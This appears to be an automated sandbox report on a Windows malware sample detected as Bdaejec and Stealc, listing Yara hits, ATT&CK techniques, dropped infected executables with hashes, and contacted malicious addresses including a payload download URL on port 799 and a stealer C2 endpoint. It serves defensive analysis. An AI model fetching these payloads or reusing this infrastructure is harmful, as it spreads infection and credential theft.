                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.7Y18r(193).exe.2430000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7Y18r(193).exe PID: 7472, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Bdaejec
                  Source: Yara matchFile source: Process Memory Space: WuiXLS.exe PID: 7496, type: MEMORYSTR
                  Yara detected Stealc
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 0.3.7Y18r(193).exe.2430000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.890e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.7Y18r(193).exe.2430000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7Y18r(193).exe PID: 7472, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts22
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Access Token Manipulation                  		1
                  Virtualization/Sandbox Evasion                  		11
                  Input Capture                  		11
                  System Time Discovery                  		1
                  Taint Shared Content                  		11
                  Input Capture                  		2
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
                  Process Injection                  		1
                  Access Token Manipulation                  		LSASS Memory121
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		2
                  Process Injection                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets1
                  Account Discovery                  		SSHKeylogging112
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                  Software Packing                  		Cached Domain Credentials1
                  System Owner/User Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync3
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482727 Sample: 7Y18r(193).exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 31 ddos.dnsnb8.net 2->31 35 Found malware configuration 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 13 other signatures 2->41 8 7Y18r(193).exe 1 2->8         started        signatures3 process4 file5 21 C:\Users\user\AppData\Local\Temp\WuiXLS.exe, PE32 8->21 dropped 43 Detected unpacking (changes PE section rights) 8->43 45 Detected unpacking (overwrites its own PE header) 8->45 47 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 8->47 49 Found evasive API chain (may stop execution after checking locale) 8->49 12 WuiXLS.exe 12 8->12         started        17 WerFault.exe 19 16 8->17         started        signatures6 process7 dnsIp8 33 ddos.dnsnb8.net 44.221.84.105, 49705, 799 AMAZON-AESUS United States 12->33 23 C:\Program Files\7-Zip\Uninstall.exe, PE32 12->23 dropped 25 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 12->25 dropped 27 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 12->27 dropped 51 Antivirus detection for dropped file 12->51 53 Multi AV Scanner detection for dropped file 12->53 55 Detected unpacking (changes PE section rights) 12->55 57 2 other signatures 12->57 19 WerFault.exe 19 16 12->19         started        29 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->29 dropped file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  7Y18r(193).exe96%ReversingLabsWin32.Virus.Jadtre
                  7Y18r(193).exe93%VirustotalBrowse
                  7Y18r(193).exe100%AviraW32/Jadtre.B
                  7Y18r(193).exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
                  C:\Users\user\AppData\Local\Temp\WuiXLS.exe100%AviraTR/Dldr.Small.Z.haljq
                  C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\WuiXLS.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\WuiXLS.exe92%ReversingLabsWin32.Trojan.Madeba

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://www.smartsharesystems.com/Morten0%URL Reputationsafe
                  http://www.scintilla.org/scite.rng0%URL Reputationsafe
                  http://www.develop.com0%URL Reputationsafe
                  http://www.lua.org0%URL Reputationsafe
                  http://www.rftp.comJosiah0%URL Reputationsafe
                  http://www.activestate.com0%URL Reputationsafe
                  http://ddos.dnsnb8.net/100%URL Reputationmalware
                  http://www.activestate.comHolger0%URL Reputationsafe
                  http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
                  http://www.spaceblue.com0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  http://www.baanboard.com0%URL Reputationsafe
                  http://www.rftp.com0%URL Reputationsafe
                  http://www.develop.comDeepak0%URL Reputationsafe
                  http://www.baanboard.comBrendon0%URL Reputationsafe
                  https://www.smartsharesystems.com/0%URL Reputationsafe
                  http://www.scintilla.org0%URL Reputationsafe
                  http://www.spaceblue.comMathias0%URL Reputationsafe
                  http://bernardofata.icu/40d570f44e84a454.php100%Avira URL Cloudmalware
                  http://ddos.dnsnb8.net:799/cj//k1.rarq100%Avira URL Cloudmalware
                  http://ddos.dnsnb8.net:799/cj//k1.rarp100%Avira URL Cloudphishing
                  http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k1.rarH100%Avira URL Cloudphishing
                  http://ddos.dnsnb8.net:799/cj//k1.rarn.=100%Avira URL Cloudphishing

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ddos.dnsnb8.net
                  		44.221.84.105
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://bernardofata.icu/40d570f44e84a454.phptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rartrue
                    • URL Reputation: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.develop.comSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.lua.orgSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.rftp.comJosiahSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.activestate.comSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ddos.dnsnb8.net/WuiXLS.exe, 00000002.00000002.1505404095.0000000000611000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://www.activestate.comHolgerSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEWuiXLS.exe, 00000002.00000003.1394029719.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rarqWuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.spaceblue.comSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rarpWuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://upx.sf.netAmcache.hve.6.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.baanboard.comSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.rftp.comSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rarn.=WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://www.develop.comDeepakSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rarHWuiXLS.exe, 00000002.00000002.1505404095.000000000059E000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://www.baanboard.comBrendonSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.smartsharesystems.com/SciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.scintilla.orgSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    44.221.84.105
                    		ddos.dnsnb8.netUnited States
                    		14618AMAZON-AESUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1482727
                    Start date and time:2024-07-26 02:50:35 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:15
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:7Y18r(193).exe
                    Detection:MAL
                    Classification:mal100.spre.troj.evad.winEXE@5/13@4/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 72
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.21
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    20:51:38API Interceptor2x Sleep call for process: WerFault.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    44.221.84.105BUG32.exeGet hashmaliciousBdaejecBrowse
                    • ddos.dnsnb8.net:799/cj//k1.rar
                    7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                    • ddos.dnsnb8.net:799/cj//k1.rar
                    A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                    • ddos.dnsnb8.net:799/cj//k1.rar
                    BUG32.exeGet hashmaliciousBdaejecBrowse
                    • ddos.dnsnb8.net:799/cj//k2.rar
                    builder_Release.exeGet hashmaliciousBdaejecBrowse
                    • ddos.dnsnb8.net:799/cj//k1.rar
                    BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
                    • ddos.dnsnb8.net:799/cj//k4.rar
                    BkPack.exeGet hashmaliciousBdaejecBrowse
                    • ddos.dnsnb8.net:799/cj//k3.rar
                    DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                    • ddos.dnsnb8.net:799/cj//k1.rar
                    E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                    • ddos.dnsnb8.net:799/cj//k5.rar
                    dllhost.exeGet hashmaliciousBdaejecBrowse
                    • ddos.dnsnb8.net:799/cj//k1.rar

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ddos.dnsnb8.netBUG32.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    7Y18r(212).exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                    • 44.221.84.105
                    A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                    • 44.221.84.105
                    BUG32.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    builder_Release.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                    • 44.221.84.105
                    BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    BkPack.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AMAZON-AESUSBUG32.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                    • 44.221.84.105
                    A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                    • 44.221.84.105
                    BUG32.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    builder_Release.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    BkPack.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105
                    DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                    • 44.221.84.105
                    E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                    • 44.221.84.105
                    dllhost.exeGet hashmaliciousBdaejecBrowse
                    • 44.221.84.105

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Temp\WuiXLS.exe7Y18r(212).exeGet hashmaliciousBdaejecBrowse
                      7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                        7Y18r(223).exeGet hashmaliciousBdaejecBrowse
                          builder_Release.exeGet hashmaliciousBdaejecBrowse
                            A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                              BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
                                BkPack.exeGet hashmaliciousBdaejecBrowse
                                  bss.exeGet hashmaliciousBdaejecBrowse
                                    C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                      builder_Release.exeGet hashmaliciousBdaejecBrowse

                                        Created / dropped Files

                                        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):19456
                                        Entropy (8bit):6.590617265551709
                                        Encrypted:false
                                        SSDEEP:384:1FpSPXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:MRQGPL4vzZq2o9W7GsxBbPr
                                        MD5:5DD5E8954472C433520EC6945EF48D18
                                        SHA1:4FB35D158F3BC6FA8FDF24D7627A769B469AE13D
                                        SHA-256:0746E902413AC4EDDF1DD4043F23A0F1E926E660987254899DCDBB347C033581
                                        SHA-512:00B3E0EA5B1692DF37EB420AAC43A63FA17737771F3377D32B6997954EDE06FC7F3CA7E65B478D1AF527A704CEDD46BB32FB7B1D1ECC0CDB1E6C4CFA0BC2A1E7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:modified
                                        Size (bytes):2389504
                                        Entropy (8bit):6.731344336459406
                                        Encrypted:false
                                        SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                        MD5:4C6F3B94A176D722328CB44FC0A4EEB3
                                        SHA1:A6C6B1F359D8670A877FDDBD3D918DF906D571D1
                                        SHA-256:936263015B621BD3211A2824C2558FC983280CC663C5C8433DA3D7DD60E8551C
                                        SHA-512:F984AEB9AAAA92144D561AC0F336B12A2FED0110F622DC7CDAB25A36395749FCAC087C2D9093F964307F915A5BF144CB28432C366CC1DA6D1F9362F1C478252B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                                        C:\Program Files\7-Zip\Uninstall.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):31744
                                        Entropy (8bit):6.365978439038225
                                        Encrypted:false
                                        SSDEEP:768:uWQ3655Kv1X/qY1MSdgtQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdgaGCq2iW7z
                                        MD5:00E6AA046C6B3F8C7416501E743B72BC
                                        SHA1:77BA8DCDD2B73F20D953D6BAF4DEE41D31AF2F40
                                        SHA-256:FCBB9E68B0F4F1B598801C58542B6F940A47F366472614338E795AC6A9EDA262
                                        SHA-512:56CCC930C3AB9A81E2141AA493C7C27A389D09BA5E5EB33A5B5A1E6DF85168E1774D3FDC35D6C4E6D8DF8A35FA7E9BB8933234FA1273C566F873D0EE598811D9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7Y18r(193).exe_904ebe8ba3e96d2d01f96708bde8f3cf5778cd4_17ee7a96_32e72f6e-ae3a-4a61-bf45-ec127ffb67c4\Report.wer

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.7788669724727739
                                        Encrypted:false
                                        SSDEEP:192:nFbspr54OYA0tbGyjjTzuiFDZ24IO8+q:F+t4OYbtbGyj3zuiFDY4IO8+
                                        MD5:A3F8639B2251E1D941F7D583E0644A59
                                        SHA1:0B02007AA291B606DB62203850AF7BBA3BB270F2
                                        SHA-256:CA50F93F3C4F28051EA0AA324B746A869DD5B1213D8D3167DE939CFFC6C5D349
                                        SHA-512:20F5988956FF46C22D88560C8B0956C8FD87BD5D7F2EDF4951691F86B7A62D41A468608FD005D40CE55B1B451F886A480F423B787431C99808C8315C0091CDE8
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.4.4.0.5.7.1.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.4.7.1.8.2.1.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.e.7.2.f.6.e.-.a.e.3.a.-.4.a.6.1.-.b.f.4.5.-.e.c.1.2.7.f.f.b.6.7.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.4.1.c.b.f.4.-.5.8.6.5.-.4.a.d.c.-.a.9.5.f.-.9.8.6.a.8.5.3.c.4.8.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.Y.1.8.r.(.1.9.3.)...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.0.-.0.0.0.1.-.0.0.1.4.-.f.9.5.6.-.6.a.f.2.f.5.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.1.c.f.a.5.0.e.7.a.a.7.e.4.b.d.d.2.4.6.6.8.2.8.3.9.9.1.1.9.2.e.0.0.0.0.f.f.f.f.!.0.0.0.0.0.9.7.5.4.9.6.8.7.2.2.7.3.1.f.b.2.0.8.d.d.b.e.b.c.c.6.c.6.a.7.c.c.9.d.4.2.c.7.b.!.7.Y.1.8.r.(.1.9.3.)...e.x.e.....T.a.r.g.e.t.A.p.p.

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WuiXLS.exe_a22b3851192b317e0211b41e153fb28ae945_4c9ae75e_83cc07d0-134f-472c-b0c4-fd05e18d947a\Report.wer

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9230343872783822
                                        Encrypted:false
                                        SSDEEP:192:ufgSTbDh602EJo+jkfBzuiFDZ24IO8skr:ufPvDhB26o+jKzuiFDY4IO8s
                                        MD5:752119478B65B653E5E532208197240B
                                        SHA1:2F890A705D3E9331ED71A1EB4A8BB41A518243E7
                                        SHA-256:73BB0F095A2642E718BED2F99779C4F2B22955663973860F023733081265C1ED
                                        SHA-512:B092D23869009779BE0F4EF90ED8BA7D744585E32BDF957207D94F1AA3A2F25192B25B07A650980B03005BF400565842CDC0662C2AEA73C87602CDD7DCABA37A
                                        Malicious:false
                                        Reputation:low
